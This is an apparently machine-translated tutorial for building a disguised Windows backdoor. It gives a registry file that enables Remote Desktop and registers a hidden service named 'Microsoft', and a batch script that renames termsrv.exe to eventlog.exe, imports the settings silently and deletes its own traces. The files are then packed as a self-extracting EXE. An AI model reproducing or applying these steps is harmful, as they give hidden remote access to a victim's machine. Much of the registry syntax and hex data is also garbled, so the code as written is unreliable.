First we create a 3389 tool first put the following registry content Copy, saved as 3389.REG registry file registry content: Windows registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / NetCache] "enabled "=" 0 "[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon]" ShutdownWithoutLogon "=" 0 "[HKEY_LOCAL_MACHINE / SOFTWARE / Policies / Microsoft / Windows / Installer]" EnableAdminTSRemote "= dword: 00000001 [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Control / Terminal Server] "TSEnabled" = dword: 00000001 [HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / TermDD] "Start" = dword: 00000002 [HKEY_USERS / .DEFAULT / Keyboard Layout / Toggle] "Hotkey" = "1 "[HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SYSTEM / SECUSERVICE]" Start "= dword: 00000002" ErrorControl "= dword: 00000001" ImagePath "= HEX (2): 25,00, 53,00, 79,00,73,00 74,00, 65, 100, 6d, 00, 52, 100, 6F, 00, 6F, 00, / 74, 100, 25, 100, 5C, 00, 53, 3, 79, 100, 73, 100, 74,00, 65, 3, 6d, 00, 33, 32, 100, 5c, 00, 65, / 00, 76, 100, 65, 0, 6E, 00, 74, 100, 6C, 00, 6F 00, 67, 00, 2E, 00, 65, 3, 78, 100, 65, 100, 00 "Objectname" = "Localsy STEM "TYPE" = DWORD: 00000010 "Description" = "Microsoft" "DisplayName" = "Microsoft" then saved the following content as a batch file 3389.BAT installation batch content: Copy Termsrv.exe Eventlog.exe regedit. Exe / s 3389.reg del 3389.reg del 3389.exe del 3389.bat creates WinRAR to make an EXE self-description compression package